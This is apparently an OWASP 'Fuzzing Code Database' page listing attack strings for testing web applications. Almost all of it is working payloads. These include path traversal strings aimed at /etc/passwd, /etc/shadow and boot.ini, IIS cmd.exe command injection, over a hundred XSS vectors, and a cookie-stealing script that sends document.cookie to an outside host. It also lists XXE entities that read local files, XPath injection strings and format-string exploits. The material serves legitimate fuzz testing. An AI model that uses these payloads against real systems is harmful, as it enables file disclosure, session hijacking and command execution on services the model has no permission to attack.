%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
../../../.htaccess
../../.htaccess
../.htaccess
.htaccess
././.htaccess
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%68%74%61%63%63%65%73%73
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini

Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".

XSS Statements - Most effective/most common statements

Testing Statements

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
'';!--"<XSS>=&{()}

Common exploit code (covers a lot of XSS vulnerabilities)

'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
'); alert('xss'); var x='
\\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));

XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)

Statements
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
"<IMG SRC=""javascript:alert('XSS');"">"
<IMG SRC=JaVaScRiPt:alert('XSS')>
"<IMG SRC=javascript:alert(""XSS"")>"
"<IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`>"
"<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>"">"
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
"<IMG SRC=""jav"
"ascript:alert('XSS');"">"
"perl -e 'print ""<IMG SRC=java\0script:alert(\""XSS\"")>"";' > out"
"perl -e 'print ""<SCR\0IPT>alert(\""XSS\"")</SCR\0IPT>"";' > out"
"<IMG SRC="" &#14;  javascript:alert('XSS');"">"
"<SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(""XSS"")>"
"<SCRIPT/SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<<SCRIPT>alert(""XSS"");//<</SCRIPT>"
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<SCRIPT SRC=//ha.ckers.org/.j>
"<IMG SRC=""javascript:alert('XSS')"""
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT>
"\"";alert('XSS');//"
"</TITLE><SCRIPT>alert(""XSS"");</SCRIPT>"
"<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');"">"
"<BODY BACKGROUND=""javascript:alert('XSS')"">"
<BODY ONLOAD=alert('XSS')>
"<IMG DYNSRC=""javascript:alert('XSS')"">"
"<IMG LOWSRC=""javascript:alert('XSS')"">"
"<BGSOUND SRC=""javascript:alert('XSS');"">"
"<BR SIZE=""&{alert('XSS')}"">"
"<LAYER SRC=""http://ha.ckers.org/scriptlet.html""></LAYER>"
"<LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');"">"
"<LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css"">"
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
"<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.org/xss.css>; REL=stylesheet"">"
"<STYLE>BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}</STYLE>"
"<XSS STYLE=""behavior: url(xss.htc);"">"
"<STYLE>li {list-style-image: url(""javascript:alert('XSS')"");}</STYLE><UL><LI>XSS"
"<IMG SRC='vbscript:msgbox(""XSS"")'>"
¼script¾alert(¢XSS¢)¼/script¾
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');"">"
"<IFRAME SRC=""javascript:alert('XSS');""></IFRAME>"
"<FRAMESET><FRAME SRC=""javascript:alert('XSS');""></FRAMESET>"
"<TABLE BACKGROUND=""javascript:alert('XSS')"">"
"<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">"
"<DIV STYLE=""background-image: url(javascript:alert('XSS'))"">"
"<DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"">"
"<DIV STYLE=""background-image: url(&#1;javascript:alert('XSS'))"">"
"<DIV STYLE=""width: expression(alert('XSS'));"">"
"<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYLE>"
"<IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))"">"
"<XSS STYLE=""xss:expression(alert('XSS'))"">"
"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>"
"<STYLE TYPE=""text/javascript"">alert('XSS');</STYLE>"
"<STYLE>.XSS{background-image:url(""javascript:alert('XSS')"");}</STYLE><A CLASS=XSS></A>"
"<STYLE type=""text/css"">BODY{background:url(""javascript:alert('XSS')"")}</STYLE>"
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
"<BASE HREF=""javascript:alert('XSS');//"">"
"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""></OBJECT>"
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
"<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""></EMBED>"
"<EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""></EMBED>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>"
"<XML SRC=""xsstest.xml"" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>alert(""XSS"")</SCRIPT>""></BODY></HTML>"
"<SCRIPT SRC=""http://ha.ckers.org/xss.jpg""></SCRIPT>"
"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'""-->"
"<? echo('<SCR)';echo('IPT>alert(""XSS"")</SCRIPT>'); ?>"
"<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('XSS')</SCRIPT>"">"
"<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"
"<SCRIPT a="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT ="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a="">"" '' SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT ""a='>'"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a=`>` SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a="">'>"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<A HREF=""http://66.102.7.147/"">XSS</A>"
"<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"">XSS</A>"
"<A HREF=""http://1113982867/"">XSS</A>"
"<A HREF=""http://0x42.0x0000066.0x7.0x93/"">XSS</A>"
"<A HREF=""http://0102.0146.0007.00000223/"">XSS</A>"
"<A HREF=""h\ntt\tp://6"
"<A HREF=""//www.google.com/"">XSS</A>"
"<A HREF=""//google"">XSS</A>"
"<A HREF=""http://google.com/"">XSS</A>"
"<A HREF=""http://www.google.com./"">XSS</A>"
"<A HREF=""javascript:document.location='http://www.google.com/'"">XSS</A>"
"<A HREF=""http://www.gohttp://www.google.com/ogle.com/"">XSS</A>"
"<div onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<bgsound src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"&{document.write(""XSS-XSS-XSS"");};"
"<img src=&{document.write(""XSS-XSS-XSS"");};>"
"<link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<iframe src=""vbscript:document.write(""XSS-XSS-XSS"");"">"
"<img src=""livescript:document.write(""XSS-XSS-XSS"");"">"
"<a href=""about:<script>document.write(""XSS-XSS-XSS"");</script>"">"
"<meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");"">"
"<body onload=""document.write(""XSS-XSS-XSS"");"">"
"<div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););"">"
"<div style=""behaviour: url([link to code]);"">"
"<div style=""binding: url([link to code]);"">"
"<div style=""width: expression(document.write(""XSS-XSS-XSS""););"">"
"<style type=""text/javascript"">document.write(""XSS-XSS-XSS"");</style>"
"<object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<style><!--</style><script>document.write(""XSS-XSS-XSS"");//--></script>"
"<![CDATA[<!--]]><script>document.write(""XSS-XSS-XSS"");//--></script>"
"<<script>document.write(""XSS-XSS-XSS"");</script>"
"<img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""blah>"" onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<div datafld=""b"" dataformatas=""html"" datasrc=""#X""></div>"
"<a href=""javascript#document.write(""XSS-XSS-XSS"");"">"
"<img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"&<script>document.write(""XSS-XSS-XSS"");</script>"
"<img src=""mocha:document.write(""XSS-XSS-XSS"");"">"
"<div style=""binding: url([link to code]);""> [Mozilla]"
"<!-- -- --><script>document.write(""XSS-XSS-XSS"");</script><!-- -- -->"
"<xml src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<xml id=""X""><a><b><script>document.write(""XSS-XSS-XSS"");</script>;</b></a></xml>"
"[\xC0][\xBC]script>document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script>"
><script>
"<script>alert(""WXSS"")</script>"
"<<script>alert(""WXSS"");//<</script>"
<script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
'><script>alert(document.cookie);</script>
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
&ltscript&gtalert(document.cookie);</script>
&ltscript&gtalert(document.cookie);&ltscript&gtalert
<xss><script>alert('WXSS')</script></vulnerable>
<IMG%20SRC='javascript:alert(document.cookie)'>
"<IMG%20SRC=""javascript:alert('WXSS');"">"
"<IMG%20SRC=""javascript:alert('WXSS')"""
<IMG%20SRC=JaVaScRiPt:alert('WXSS')>
<IMG%20SRC=javascript:alert("WXSS")>
"<IMG%20SRC=`javascript:alert(""'WXSS'"")`>"
"<IMG%20""""""><SCRIPT>alert(""WXSS"")</SCRIPT>"">"
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='javasc
"<IMG%20SRC=""jav"
"<IMG%20SRC=""jav	ascript:alert('WXSS');"">"
"<IMG%20SRC=""jav
ascript:alert('WXSS');"">"
"<IMG%20SRC=""jav
ascript:alert('WXSS');"">"
"<IMG%20SRC=""%20&#14;%20javascript:alert('WXSS');"">"
"<IMG%20DYNSRC=""javascript:alert('WXSS')"">"
"<IMG%20LOWSRC=""javascript:alert('WXSS')"">"
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
<IMG%20SRC=javascript:alert('XSS')>
<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
"><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
'';!--<XSS>=&{()}"


XML Attacks - (Update: 11 August 2009 - Total Statements: 15)

Statements
count(/child::node())
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"

Format String Statements - (Update: xx/xx/xx - Total Statements: 28)

%s%p%x%d
.1024d
%.2049d
%p%p%p%p
%x%x%x%x
%d%d%d%d
%s%s%s%s
%99999999999s
%08x
%%20d
%%20n
%%20x
%%20s
%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
f(x)=%s x 123
f(x)=%x x 255
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
`perl -e 'print ".%p" x 80'`%n
%08x.%08x.%08x.%08x.%08x\n
XXX0_%08x.%08x.%08x.%08x.%08x\n
%.16705u%2\$hn
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;

Project Contributor

Project Leader: Wagner Elias

Reviewer: Eduardo Neves

Contributor: Ulisses Castro

Feedback and Participation

We hope you find the Fuzzing Code Database useful. Please contribute to the project by volunteering for one of the tasks or by sending your comments, questions, and suggestions to wagner.elias |at| owasp.org.

Project Identification

PROJECT INFO
What does this OWASP project offer you?
what is this project?
OWASP Fuzzing Code Database

Purpose: N/A

License: N/A

who is working on this project?
Project Leader: Wagner Elias

Project Maintainer:

Project Contributor(s): N/A

how can you learn more?
Project Pamphlet: N/A

